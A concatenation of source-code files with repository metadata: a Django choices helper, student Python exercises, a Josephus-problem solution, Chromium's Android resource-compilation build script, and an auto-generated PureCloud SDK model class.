``creator_type``. choice_entry: ChoiceEntry The ``ChoiceEntry`` instance that hold the current value, used to access its constant, value and display name. 
Returns ------- ChoiceAttributeMixin An instance of a subclass of ``creator_type`` for the given value """ klass = creator_type.get_class_for_value(value) return klass(value, choice_entry) class ChoiceEntry(tuple): """Represents a choice in a ``Choices`` object, with easy access to its attribute. Expecting a tuple with three entries. (constant, value, display name), it will add three attributes to access then: ``constant``, ``value`` and ``display``. By passing a dict after these three first entries, in the tuple, it's alose possible to add some other attributes to the ``ChoiceEntry` instance``. Parameters ---------- tuple_ : tuple A tuple with three entries, the name of the constant, the value, and the display name. A dict could be added as a fourth entry to add additional attributes. Example ------- >>> entry = ChoiceEntry(('FOO', 1, 'foo')) >>> entry (u'FOO', 1, u'foo') >>> (entry.constant, entry.value, entry.display) (u'FOO', 1, u'foo') >>> entry.choice (1, u'foo') You can also pass attributes to add to the instance to create: >>> entry = ChoiceEntry(('FOO', 1, 'foo', {'bar': 1, 'baz': 2})) >>> entry (u'FOO', 1, u'foo') >>> entry.bar 1 >>> entry.baz 2 Raises ------ AssertionError If the number of entries in the tuple is not expected. Must be 3 or 4. """ # Allow to easily change the mixin to use in subclasses. ChoiceAttributeMixin = ChoiceAttributeMixin def __new__(cls, tuple_): """Construct the tuple with 3 entries, and save optional attributes from the 4th one.""" # Ensure we have exactly 3 entries in the tuple and an optional dict. assert 3 <= len(tuple_) <= 4, 'Invalid number of entries in %s' % (tuple_,) # Call the ``tuple`` constructor with only the real tuple entries. obj = super(ChoiceEntry, cls).__new__(cls, tuple_[:3]) # Save all special attributes. 
obj.constant = obj._get_choice_attribute(tuple_[0]) obj.value = obj._get_choice_attribute(tuple_[1]) obj.display = obj._get_choice_attribute(tuple_[2]) # Add an attribute holding values as expected by django. obj.choice = (obj.value, obj.display) # Add additional attributes. if len(tuple_) == 4: for key, value in tuple_[3].items(): setattr(obj, key, value) return obj def _get_choice_attribute(self, value): """Get a choice attribute for the given value. Parameters ---------- value: ? The value for which we want a choice attribute. Returns ------- An instance of a class based on ``ChoiceAttributeMixin`` for the given value. Raises ------ ValueError If the value is None, as we cannot really subclass NoneType. """ if value is None: raise ValueError('Using `None` in a `Choices` object is not supported. You may ' 'use an empty string.') return create_choice_attribute(self.ChoiceAttributeMixin, value, self)
[ "s.angel@twidi.com" ]
s.angel@twidi.com
8d9d148953206e97e3b9e765ea30a82e1f309b3c
b52781b9065f6c571beb1b87cc1bbe2bd121d272
/homework02-2.py
ec526d0046c8919a827e61fc4c767ff2980b0b1d
[ "Apache-2.0" ]
permissive
liuhuihui123/liuhuihui
97e4182bb2003b95d1236f8f8e108215beaa9dfa
5dfa7b6ba7bc752edc48e981dd71f81017d3b673
refs/heads/master
2020-03-29T18:06:07.971173
2018-10-12T01:28:21
2018-10-12T01:28:21
150,194,561
0
0
null
null
null
null
UTF-8
Python
false
false
2,844
py
'''#1 import math a, b, c = eval(raw_input("Enter a, b, c:")) n = b*b-4*a*c if (n>0): r1 =( -b + math.sqrt(b*b-4*a*c))/2*a r2 =( -b - math.sqrt(b*b-4*a*c))/2*a print(r1 , r2) elif (n==0): r1 =( -b + math.sqrt(b*b-4*a*c))/2*a r2 =( -b - math.sqrt(b*b-4*a*c))/2*a r1 = r2 print(r1) if (n<0) : print("The equation has no real roots") ''' '''#2 import random n1=random.randint(1,100) n2=random.randint(1,100) n=n1+n2 num = raw_input(("qing shu ru shang mian de lia ge shu zhi he:")) if num == n: print("True") else: print("False") print(n) ''' '''#3 today = eval (raw_input("jin tian shi :")) day = eval(raw_input("guo le ji tian :")) week = (today+day)%7 if week == 0: print("jin tian shi {} and the future day is Sunday".format(today)) elif week == 1: print("jin tian shi {} and the future day is Monday".format(today)) elif week == 2: print("jin tian shi {} and the future day is Tuesday".format(today)) elif week == 3: print("jin tian shi {} and the future day is Wendnesday".format(today)) elif week == 4: print("jin tian shi {} and the future day is Thurday".format(today)) elif week == 5: print("jin tian shi {} and the future day is Firday".format(today)) ''' '''#4 print("qing shu ru san ge zheng shu :") x = eval(raw_input(">>")) y = eval(raw_input(">>")) z = eval(raw_input(">>")) if x>y: x,y = y,x if x>z: x,z = z,x if y>z: y,z = z,y print(x,y,z) ''' '''#5 w1,p1 = eval(raw_input('Enter weight and price for package 1"')) w2,p2 = eval(raw_input('Enter weight and price for package 2"')) baozhuang1 = p1 / w1 baozhuang2 = p2 / w2 if baozhuang1 < baozhuang2: print('package 1 has the better price') elif baozhuang1 >baozhuang2: print('package 2 has the better price') else: print('package 1 the same as package 2') ''' '''#6 month ,year = eval(raw_input("shu ru month and years:")) a = 0 if(a){ case 1: case 3: case 5: case 7: case 8: case 10: case 12 :print("31\n");break case 2:if (year%4==0 and year%100!=0 | year%400==0): a=29 else: a=28 case 4: case 6: case 9: case 11:print("30\n"); } 
print(a) ''' '''#7 import random yingbi = eval(raw_input("cha shi zhengmian(1) huanshi fanmian(0):")) n = random.randint(0,1) if (n == 1): print('True') if n==0: print('False') ''' '''#11 num = eval(raw_input("shu ru yi ge san wei shu:")) bai = num /100 shi = num/10%10 ge = num % 10 if bai == ge: print("{} is a pailndrome".format(num)) else: print("{} is not a pailndrome".format(num)) ''' '''#12 a,b,c = eval(raw_input("shu ru san jiao xing de san ge bian:")) zc = a+b+c if (a+b>c): print("The perimeter is {}".format(zc)) else: print("shu ru fei fa") '''
[ "root@localhost.localdomain" ]
root@localhost.localdomain
9687778c402ee8e82a0755b2f05fcccedc652e9c
747afe9a5915c28831b86b0a5e2c044212664da5
/20170908/lyrichu_20170908_02.py
c61772bc56e104218c145a6deb05cb7f8116d16d
[]
no_license
nitinreddy3/Python-Machine-Learning-Homework
61c7b882b49e868ca37443feaa89494d5b6eba4a
b088bdcdb24892260e1db416d50f0750872e80bc
refs/heads/master
2021-07-17T04:42:12.233768
2017-10-23T15:29:24
2017-10-23T15:29:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,303
py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/9/8 17:55
# @Author : Lyrichu
# @Email : 919987476@qq.com
# @File : lyrichu_20170908_02.py
'''
@Description:
2. 100 people stand in a circle, numbered 1 to 100. Starting from person 1
they count off from 1; whoever says M leaves the circle and the next person
restarts the count at 1. This repeats until fewer than M people remain.
Print the numbers of the people left, in ascending order.

Sample input:  3   -> sample output: 58 91
Sample input:  4   -> sample output: 34 45 97
'''
# Rewritten as a testable function: the original simulated whole counting
# sweeps with per-round renumbering of every survivor and read stdin at
# import time via the Python-2-only raw_input().


def josephus_survivors(m, total=100):
    """Run the counting-out game and return the survivors.

    :param m: the count at which a person leaves the circle (m >= 1)
    :param total: number of people initially in the circle (default 100)
    :return: list of the surviving people's numbers, in ascending order
    """
    people = list(range(1, total + 1))
    idx = 0  # position of the next person to start counting from
    while len(people) >= m:
        # The person m-1 steps ahead (inclusive count) says "m" and leaves;
        # counting then resumes from the person after them.
        idx = (idx + m - 1) % len(people)
        people.pop(idx)
    # Removals preserve relative order, so the list is already ascending.
    return people


if __name__ == '__main__':
    m = int(input())
    print(" ".join(str(p) for p in josephus_survivors(m)))
[ "919987476@qq.com" ]
919987476@qq.com
53736c845010ca9ab5541f5868401ff5198989c3
c8e6cf760a78ec45dbc2d3b6452e352d12da1f43
/build/android/gyp/compile_resources.py
a40864b8c3e4aa1f405d00e52b7c2a1ecf967b08
[ "BSD-3-Clause" ]
permissive
tojoyccnu/chromium
15479d1d9e8159d5eecd61571d33effa78e573b7
8cba72403a712767289acb2c7cd06d1116db42cc
refs/heads/master
2023-03-04T11:55:25.131615
2018-06-26T13:34:07
2018-06-26T13:34:07
null
0
0
null
null
null
null
UTF-8
Python
false
false
24,111
py
#!/usr/bin/env python # # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Compile Android resources into an intermediate APK. This can also generate an R.txt, and an .srcjar file containing the proper final R.java class for all resource packages the APK depends on. This will crunch images with aapt2. """ import argparse import collections import multiprocessing.pool import os import re import shutil import subprocess import sys import zipfile from xml.etree import ElementTree from util import build_utils from util import resource_utils _SOURCE_ROOT = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname( __file__)))) # Import jinja2 from third_party/jinja2 sys.path.insert(1, os.path.join(_SOURCE_ROOT, 'third_party')) from jinja2 import Template # pylint: disable=F0401 # Pngs that we shouldn't convert to webp. Please add rationale when updating. _PNG_WEBP_BLACKLIST_PATTERN = re.compile('|'.join([ # Crashes on Galaxy S5 running L (https://crbug.com/807059). r'.*star_gray\.png', # Android requires pngs for 9-patch images. r'.*\.9\.png', # Daydream requires pngs for icon files. r'.*daydream_icon_.*\.png'])) # Regular expression for package declaration in 'aapt dump resources' output. _RE_PACKAGE_DECLARATION = re.compile( r'^Package Group ([0-9]+) id=0x([0-9a-fA-F]+)') def _PackageIdArgument(x): """Convert a string into a package ID while checking its range. Args: x: argument string. Returns: the package ID as an int, or -1 in case of error. """ try: x = int(x, 0) if x < 0 or x > 127: x = -1 except ValueError: x = -1 return x def _ParseArgs(args): """Parses command line options. 
Returns: An options object as from argparse.ArgumentParser.parse_args() """ parser, input_opts, output_opts = resource_utils.ResourceArgsParser() input_opts.add_argument('--android-manifest', required=True, help='AndroidManifest.xml path') input_opts.add_argument( '--shared-resources', action='store_true', help='Make all resources in R.java non-final and allow the resource IDs ' 'to be reset to a different package index when the apk is loaded by ' 'another application at runtime.') input_opts.add_argument( '--app-as-shared-lib', action='store_true', help='Same as --shared-resources, but also ensures all resource IDs are ' 'directly usable from the APK loaded as an application.') input_opts.add_argument( '--shared-resources-whitelist', help='An R.txt file acting as a whitelist for resources that should be ' 'non-final and have their package ID changed at runtime in R.java. ' 'Implies and overrides --shared-resources.') input_opts.add_argument('--proto-format', action='store_true', help='Compile resources to protocol buffer format.') input_opts.add_argument('--support-zh-hk', action='store_true', help='Use zh-rTW resources for zh-rHK.') input_opts.add_argument('--debuggable', action='store_true', help='Whether to add android:debuggable="true"') input_opts.add_argument('--version-code', help='Version code for apk.') input_opts.add_argument('--version-name', help='Version name for apk.') input_opts.add_argument( '--no-compress', help='disables compression for the given comma-separated list of ' 'extensions') input_opts.add_argument( '--locale-whitelist', default='[]', help='GN list of languages to include. All other language configs will ' 'be stripped out. 
List may include a combination of Android locales ' 'or Chrome locales.') input_opts.add_argument('--exclude-xxxhdpi', action='store_true', help='Do not include xxxhdpi drawables.') input_opts.add_argument( '--xxxhdpi-whitelist', default='[]', help='GN list of globs that say which xxxhdpi images to include even ' 'when --exclude-xxxhdpi is set.') input_opts.add_argument('--png-to-webp', action='store_true', help='Convert png files to webp format.') input_opts.add_argument('--webp-binary', default='', help='Path to the cwebp binary.') input_opts.add_argument('--no-xml-namespaces', action='store_true', help='Whether to strip xml namespaces from processed ' 'xml resources') input_opts.add_argument( '--check-resources-pkg-id', type=_PackageIdArgument, help='Check the package ID of the generated resources table. ' 'Value must be integer in [0..127] range.') output_opts.add_argument('--apk-path', required=True, help='Path to output (partial) apk.') output_opts.add_argument('--apk-info-path', required=True, help='Path to output info file for the partial apk.') output_opts.add_argument('--srcjar-out', help='Path to srcjar to contain generated R.java.') output_opts.add_argument('--r-text-out', help='Path to store the generated R.txt file.') output_opts.add_argument('--proguard-file', help='Path to proguard.txt generated file') output_opts.add_argument( '--proguard-file-main-dex', help='Path to proguard.txt generated file for main dex') options = parser.parse_args(args) resource_utils.HandleCommonOptions(options) options.locale_whitelist = build_utils.ParseGnList(options.locale_whitelist) options.xxxhdpi_whitelist = build_utils.ParseGnList(options.xxxhdpi_whitelist) if options.check_resources_pkg_id is not None: if options.check_resources_pkg_id < 0: raise Exception( 'Package resource id should be integer in [0..127] range.') if options.shared_resources and options.app_as_shared_lib: raise Exception('Only one of --app-as-shared-lib or --shared-resources ' 'can be used.') 
return options def _ExtractPackageIdFromApk(apk_path, aapt_path): """Extract the package ID of a given APK (even intermediate ones). Args: apk_path: Input apk path. aapt_path: Path to aapt tool. Returns: An integer corresponding to the APK's package id. Raises: Exception if there is no resources table in the input file. """ cmd_args = [ aapt_path, 'dump', 'resources', apk_path ] output = build_utils.CheckOutput(cmd_args) for line in output.splitlines(): m = _RE_PACKAGE_DECLARATION.match(line) if m: return int(m.group(2), 16) raise Exception("No resources in this APK!") def _SortZip(original_path, sorted_path): """Generate new zip archive by sorting all files in the original by name.""" with zipfile.ZipFile(sorted_path, 'w') as sorted_zip, \ zipfile.ZipFile(original_path, 'r') as original_zip: for info in sorted(original_zip.infolist(), key=lambda i: i.filename): sorted_zip.writestr(info, original_zip.read(info)) def _DuplicateZhResources(resource_dirs): """Duplicate Taiwanese resources into Hong-Kong specific directory.""" renamed_paths = dict() for resource_dir in resource_dirs: # We use zh-TW resources for zh-HK (if we have zh-TW resources). for path in build_utils.IterFiles(resource_dir): if 'zh-rTW' in path: hk_path = path.replace('zh-rTW', 'zh-rHK') build_utils.MakeDirectory(os.path.dirname(hk_path)) shutil.copyfile(path, hk_path) renamed_paths[os.path.relpath(hk_path, resource_dir)] = os.path.relpath( path, resource_dir) return renamed_paths def _ToAaptLocales(locale_whitelist, support_zh_hk): """Converts the list of Chrome locales to aapt config locales.""" ret = set() for locale in locale_whitelist: locale = resource_utils.CHROME_TO_ANDROID_LOCALE_MAP.get(locale, locale) if locale is None or ('-' in locale and '-r' not in locale): raise Exception('CHROME_TO_ANDROID_LOCALE_MAP needs updating.' ' Found: %s' % locale) ret.add(locale) # Always keep non-regional fall-backs. 
language = locale.split('-')[0] ret.add(language) # We don't actually support zh-HK in Chrome on Android, but we mimic the # native side behavior where we use zh-TW resources when the locale is set to # zh-HK. See https://crbug.com/780847. if support_zh_hk: assert not any('HK' in l for l in locale_whitelist), ( 'Remove special logic if zh-HK is now supported (crbug.com/780847).') ret.add('zh-rHK') return sorted(ret) def _MoveImagesToNonMdpiFolders(res_root): """Move images from drawable-*-mdpi-* folders to drawable-* folders. Why? http://crbug.com/289843 """ renamed_paths = dict() for src_dir_name in os.listdir(res_root): src_components = src_dir_name.split('-') if src_components[0] != 'drawable' or 'mdpi' not in src_components: continue src_dir = os.path.join(res_root, src_dir_name) if not os.path.isdir(src_dir): continue dst_components = [c for c in src_components if c != 'mdpi'] assert dst_components != src_components dst_dir_name = '-'.join(dst_components) dst_dir = os.path.join(res_root, dst_dir_name) build_utils.MakeDirectory(dst_dir) for src_file_name in os.listdir(src_dir): if not os.path.splitext(src_file_name)[1] in ('.png', '.webp'): continue src_file = os.path.join(src_dir, src_file_name) dst_file = os.path.join(dst_dir, src_file_name) assert not os.path.lexists(dst_file) shutil.move(src_file, dst_file) renamed_paths[os.path.relpath(dst_file, res_root)] = os.path.relpath( src_file, res_root) return renamed_paths def _CreateLinkApkArgs(options): """Create command-line arguments list to invoke 'aapt2 link'. Args: options: The command-line options tuple. Returns: A list of strings corresponding to the command-line invokation for the command, matching the arguments from |options|. 
""" link_command = [ options.aapt_path + '2', 'link', '--version-code', options.version_code, '--version-name', options.version_name, '--auto-add-overlay', '--no-version-vectors', '-o', options.apk_path, ] for j in options.android_sdk_jars: link_command += ['-I', j] if options.proguard_file: link_command += ['--proguard', options.proguard_file] if options.proguard_file_main_dex: link_command += ['--proguard-main-dex', options.proguard_file_main_dex] if options.no_compress: for ext in options.no_compress.split(','): link_command += ['-0', ext] # Note: only one of --proto-format, --shared-lib or --app-as-shared-lib # can be used with recent versions of aapt2. if options.proto_format: link_command.append('--proto-format') elif options.shared_resources: link_command.append('--shared-lib') if options.locale_whitelist: aapt_locales = _ToAaptLocales( options.locale_whitelist, options.support_zh_hk) link_command += ['-c', ','.join(aapt_locales)] if options.no_xml_namespaces: link_command.append('--no-xml-namespaces') return link_command def _ExtractVersionFromSdk(aapt_path, sdk_path): """Extract version code and name from Android SDK .jar file. Args: aapt_path: Path to 'aapt' build tool. sdk_path: Path to SDK-specific android.jar file. Returns: A (version_code, version_name) pair of strings. """ output = build_utils.CheckOutput( [aapt_path, 'dump', 'badging', sdk_path], print_stdout=False, print_stderr=False) version_code = re.search(r"versionCode='(.*?)'", output).group(1) version_name = re.search(r"versionName='(.*?)'", output).group(1) return version_code, version_name, def _FixManifest(options, temp_dir): """Fix the APK's AndroidManifest.xml. This adds any missing namespaces for 'android' and 'tools', and sets certains elements like 'platformBuildVersionCode' or 'android:debuggable' depending on the content of |options|. Args: options: The command-line arguments tuple. temp_dir: A temporary directory where the fixed manifest will be written to. 
Returns: Path to the fixed manifest within |temp_dir|. """ debug_manifest_path = os.path.join(temp_dir, 'AndroidManifest.xml') _ANDROID_NAMESPACE = 'http://schemas.android.com/apk/res/android' _TOOLS_NAMESPACE = 'http://schemas.android.com/tools' ElementTree.register_namespace('android', _ANDROID_NAMESPACE) ElementTree.register_namespace('tools', _TOOLS_NAMESPACE) original_manifest = ElementTree.parse(options.android_manifest) def maybe_extract_version(j): try: return _ExtractVersionFromSdk(options.aapt_path, j) except build_utils.CalledProcessError: return None extract_all = [maybe_extract_version(j) for j in options.android_sdk_jars] successful_extractions = [x for x in extract_all if x] if len(successful_extractions) == 0: raise Exception( 'Unable to find android SDK jar among candidates: %s' % ', '.join(options.android_sdk_jars)) elif len(successful_extractions) > 1: raise Exception( 'Found multiple android SDK jars among candidates: %s' % ', '.join(options.android_sdk_jars)) version_code, version_name = successful_extractions.pop() # ElementTree.find does not work if the required tag is the root. if original_manifest.getroot().tag == 'manifest': manifest_node = original_manifest.getroot() else: manifest_node = original_manifest.find('manifest') manifest_node.set('platformBuildVersionCode', version_code) manifest_node.set('platformBuildVersionName', version_name) if options.debuggable: app_node = original_manifest.find('application') app_node.set('{%s}%s' % (_ANDROID_NAMESPACE, 'debuggable'), 'true') with open(debug_manifest_path, 'w') as debug_manifest: debug_manifest.write(ElementTree.tostring( original_manifest.getroot(), encoding='UTF-8')) return debug_manifest_path def _ResourceNameFromPath(path): return os.path.splitext(os.path.basename(path))[0] def _CreateKeepPredicate(resource_dirs, exclude_xxxhdpi, xxxhdpi_whitelist): """Return a predicate lambda to determine which resource files to keep.""" if not exclude_xxxhdpi: # Do not extract dotfiles (e.g. 
".gitkeep"). aapt ignores them anyways. return lambda path: os.path.basename(path)[0] != '.' # Returns False only for xxxhdpi non-mipmap, non-whitelisted drawables. naive_predicate = lambda path: ( not re.search(r'[/-]xxxhdpi[/-]', path) or re.search(r'[/-]mipmap[/-]', path) or build_utils.MatchesGlob(path, xxxhdpi_whitelist)) # Build a set of all non-xxxhdpi drawables to ensure that we never exclude any # xxxhdpi drawable that does not exist in other densities. non_xxxhdpi_drawables = set() for resource_dir in resource_dirs: for path in build_utils.IterFiles(resource_dir): if re.search(r'[/-]drawable[/-]', path) and naive_predicate(path): non_xxxhdpi_drawables.add(_ResourceNameFromPath(path)) return lambda path: (naive_predicate(path) or _ResourceNameFromPath(path) not in non_xxxhdpi_drawables) def _ConvertToWebP(webp_binary, png_files): renamed_paths = dict() pool = multiprocessing.pool.ThreadPool(10) def convert_image(png_path_tuple): png_path, original_dir = png_path_tuple root = os.path.splitext(png_path)[0] webp_path = root + '.webp' args = [webp_binary, png_path, '-mt', '-quiet', '-m', '6', '-q', '100', '-lossless', '-o', webp_path] subprocess.check_call(args) os.remove(png_path) renamed_paths[os.path.relpath(webp_path, original_dir)] = os.path.relpath( png_path, original_dir) pool.map(convert_image, [f for f in png_files if not _PNG_WEBP_BLACKLIST_PATTERN.match(f[0])]) pool.close() pool.join() return renamed_paths def _CompileDeps(aapt_path, dep_subdirs, temp_dir): partials_dir = os.path.join(temp_dir, 'partials') build_utils.MakeDirectory(partials_dir) partial_compile_command = [ aapt_path + '2', 'compile', # TODO(wnwen): Turn this on once aapt2 forces 9-patch to be crunched. 
# '--no-crunch', ] pool = multiprocessing.pool.ThreadPool(10) def compile_partial(directory): dirname = os.path.basename(directory) partial_path = os.path.join(partials_dir, dirname + '.zip') compile_command = (partial_compile_command + ['--dir', directory, '-o', partial_path]) build_utils.CheckOutput(compile_command) # Sorting the files in the partial ensures deterministic output from the # aapt2 link step which uses order of files in the partial. sorted_partial_path = os.path.join(partials_dir, dirname + '.sorted.zip') _SortZip(partial_path, sorted_partial_path) return sorted_partial_path partials = pool.map(compile_partial, dep_subdirs) pool.close() pool.join() return partials def _CreateResourceInfoFile( renamed_paths, apk_info_path, dependencies_res_zips): lines = set() for zip_file in dependencies_res_zips: zip_info_file_path = zip_file + '.info' if os.path.exists(zip_info_file_path): with open(zip_info_file_path, 'r') as zip_info_file: lines.update(zip_info_file.readlines()) for dest, source in renamed_paths.iteritems(): lines.add('Rename:{},{}\n'.format(dest, source)) with open(apk_info_path, 'w') as info_file: info_file.writelines(sorted(lines)) def _PackageApk(options, dep_subdirs, temp_dir, gen_dir, r_txt_path): """Compile resources with aapt2 and generate intermediate .ap_ file. Args: options: The command-line options tuple. E.g. the generated apk will be written to |options.apk_path|. dep_subdirs: The list of directories where dependency resource zips were extracted (its content will be altered by this function). temp_dir: A temporary directory. gen_dir: Another temp directory where some intermediate files are generated. r_txt_path: The path where the R.txt file will written to. 
""" renamed_paths = dict() renamed_paths.update(_DuplicateZhResources(dep_subdirs)) keep_predicate = _CreateKeepPredicate( dep_subdirs, options.exclude_xxxhdpi, options.xxxhdpi_whitelist) png_paths = [] for directory in dep_subdirs: for f in build_utils.IterFiles(directory): if not keep_predicate(f): os.remove(f) elif f.endswith('.png'): png_paths.append((f, directory)) if png_paths and options.png_to_webp: renamed_paths.update(_ConvertToWebP(options.webp_binary, png_paths)) for directory in dep_subdirs: renamed_paths.update(_MoveImagesToNonMdpiFolders(directory)) link_command = _CreateLinkApkArgs(options) link_command += ['--output-text-symbols', r_txt_path] # TODO(digit): Is this below actually required for R.txt generation? link_command += ['--java', gen_dir] fixed_manifest = _FixManifest(options, temp_dir) link_command += ['--manifest', fixed_manifest] partials = _CompileDeps(options.aapt_path, dep_subdirs, temp_dir) for partial in partials: link_command += ['-R', partial] # Creates a .zip with AndroidManifest.xml, resources.arsc, res/* # Also creates R.txt build_utils.CheckOutput( link_command, print_stdout=False, print_stderr=False) _CreateResourceInfoFile( renamed_paths, options.apk_info_path, options.dependencies_res_zips) def _WriteFinalRTxtFile(options, aapt_r_txt_path): """Determine final R.txt and return its location. This handles --r-text-in and --r-text-out options at the same time. Args: options: The command-line options tuple. aapt_r_txt_path: The path to the R.txt generated by aapt. Returns: Path to the final R.txt file. """ if options.r_text_in: r_txt_file = options.r_text_in else: # When an empty res/ directory is passed, aapt does not write an R.txt. 
r_txt_file = aapt_r_txt_path if not os.path.exists(r_txt_file): build_utils.Touch(r_txt_file) if options.r_text_out: shutil.copyfile(r_txt_file, options.r_text_out) return r_txt_file def _OnStaleMd5(options): with resource_utils.BuildContext() as build: dep_subdirs = resource_utils.ExtractDeps(options.dependencies_res_zips, build.deps_dir) _PackageApk(options, dep_subdirs, build.temp_dir, build.gen_dir, build.r_txt_path) r_txt_path = _WriteFinalRTxtFile(options, build.r_txt_path) package = resource_utils.ExtractPackageFromManifest( options.android_manifest) # If --shared-resources-whitelist is used, the all resources listed in # the corresponding R.txt file will be non-final, and an onResourcesLoaded() # will be generated to adjust them at runtime. # # Otherwise, if --shared-resources is used, the all resources will be # non-final, and an onResourcesLoaded() method will be generated too. # # Otherwise, all resources will be final, and no method will be generated. # rjava_build_options = resource_utils.RJavaBuildOptions() if options.shared_resources_whitelist: rjava_build_options.ExportSomeResources( options.shared_resources_whitelist) rjava_build_options.GenerateOnResourcesLoaded() elif options.shared_resources or options.app_as_shared_lib: rjava_build_options.ExportAllResources() rjava_build_options.GenerateOnResourcesLoaded() resource_utils.CreateRJavaFiles( build.srcjar_dir, package, r_txt_path, options.extra_res_packages, options.extra_r_text_files, rjava_build_options) if options.srcjar_out: build_utils.ZipDir(options.srcjar_out, build.srcjar_dir) if options.check_resources_pkg_id is not None: expected_id = options.check_resources_pkg_id package_id = _ExtractPackageIdFromApk(options.apk_path, options.aapt_path) if package_id != expected_id: raise Exception('Invalid package ID 0x%x (expected 0x%x)' % (package_id, expected_id)) def main(args): args = build_utils.ExpandFileArgs(args) options = _ParseArgs(args) # Order of these must match order specified in GN so 
that the correct one # appears first in the depfile. possible_output_paths = [ options.apk_path, options.apk_path + '.info', options.r_text_out, options.srcjar_out, options.proguard_file, options.proguard_file_main_dex, ] output_paths = [x for x in possible_output_paths if x] # List python deps in input_strings rather than input_paths since the contents # of them does not change what gets written to the depsfile. input_strings = options.extra_res_packages + [ options.shared_resources, options.exclude_xxxhdpi, options.xxxhdpi_whitelist, str(options.debuggable), str(options.png_to_webp), str(options.support_zh_hk), str(options.no_xml_namespaces), ] input_strings.extend(_CreateLinkApkArgs(options)) possible_input_paths = [ options.aapt_path, options.android_manifest, options.shared_resources_whitelist, ] possible_input_paths += options.android_sdk_jars input_paths = [x for x in possible_input_paths if x] input_paths.extend(options.dependencies_res_zips) input_paths.extend(options.extra_r_text_files) if options.webp_binary: input_paths.append(options.webp_binary) build_utils.CallAndWriteDepfileIfStale( lambda: _OnStaleMd5(options), options, input_paths=input_paths, input_strings=input_strings, output_paths=output_paths, depfile_deps=options.dependencies_res_zips + options.extra_r_text_files) if __name__ == '__main__': main(sys.argv[1:])
[ "commit-bot@chromium.org" ]
commit-bot@chromium.org
aa5f9d8ad652004e8dfb05b3084f3c093ae308dc
b05761d771bb5a85d39d370c649567c1ff3eb089
/venv/lib/python3.10/site-packages/pastel/stack.py
54fb6dca9019d5c0546ee62d3ff5dcb3ade6c880
[]
no_license
JawshyJ/Coding_Practice
88c49cab955eab04609ec1003b6b8c20f103fc06
eb6b229d41aa49b1545af2120e6bee8e982adb41
refs/heads/master
2023-02-19T10:18:04.818542
2023-02-06T21:22:58
2023-02-06T21:22:58
247,788,631
4
0
null
null
null
null
UTF-8
Python
false
false
96
py
/home/runner/.cache/pip/pool/e2/22/00/6320ecd2562677b93d64e56de7c5734b6c4600779bf16003fa0927c1d3
[ "37465112+JawshyJ@users.noreply.github.com" ]
37465112+JawshyJ@users.noreply.github.com
2fc342fc0eebc6669e50dc50c0c1d8ca898780a2
234c7fb0bdabdd696c8e4c6a449ac2c8e3f14ad5
/build/PureCloudPlatformClientV2/models/flow_outcome_division_view_entity_listing.py
c6276c1beb04093276698b7e5c4e77068b3ab77d
[ "Apache-2.0", "MIT" ]
permissive
humano7/platform-client-sdk-python
2a942c43cc2d69e8cb0c4113d998e6e0664fdedb
dd5b693b1fc90c9dcb36885d7227f11221db5980
refs/heads/master
2023-04-12T05:05:53.932393
2021-04-22T03:41:22
2021-04-22T03:41:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
9,784
py
# coding: utf-8 """ Copyright 2016 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Ref: https://github.com/swagger-api/swagger-codegen """ from pprint import pformat from six import iteritems import re import json from ..utils import sanitize_for_serialization class FlowOutcomeDivisionViewEntityListing(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ def __init__(self): """ FlowOutcomeDivisionViewEntityListing - a model defined in Swagger :param dict swaggerTypes: The key is attribute name and the value is attribute type. :param dict attributeMap: The key is attribute name and the value is json key in definition. 
""" self.swagger_types = { 'entities': 'list[FlowOutcomeDivisionView]', 'page_size': 'int', 'page_number': 'int', 'total': 'int', 'first_uri': 'str', 'self_uri': 'str', 'next_uri': 'str', 'previous_uri': 'str', 'last_uri': 'str', 'page_count': 'int' } self.attribute_map = { 'entities': 'entities', 'page_size': 'pageSize', 'page_number': 'pageNumber', 'total': 'total', 'first_uri': 'firstUri', 'self_uri': 'selfUri', 'next_uri': 'nextUri', 'previous_uri': 'previousUri', 'last_uri': 'lastUri', 'page_count': 'pageCount' } self._entities = None self._page_size = None self._page_number = None self._total = None self._first_uri = None self._self_uri = None self._next_uri = None self._previous_uri = None self._last_uri = None self._page_count = None @property def entities(self): """ Gets the entities of this FlowOutcomeDivisionViewEntityListing. :return: The entities of this FlowOutcomeDivisionViewEntityListing. :rtype: list[FlowOutcomeDivisionView] """ return self._entities @entities.setter def entities(self, entities): """ Sets the entities of this FlowOutcomeDivisionViewEntityListing. :param entities: The entities of this FlowOutcomeDivisionViewEntityListing. :type: list[FlowOutcomeDivisionView] """ self._entities = entities @property def page_size(self): """ Gets the page_size of this FlowOutcomeDivisionViewEntityListing. :return: The page_size of this FlowOutcomeDivisionViewEntityListing. :rtype: int """ return self._page_size @page_size.setter def page_size(self, page_size): """ Sets the page_size of this FlowOutcomeDivisionViewEntityListing. :param page_size: The page_size of this FlowOutcomeDivisionViewEntityListing. :type: int """ self._page_size = page_size @property def page_number(self): """ Gets the page_number of this FlowOutcomeDivisionViewEntityListing. :return: The page_number of this FlowOutcomeDivisionViewEntityListing. 
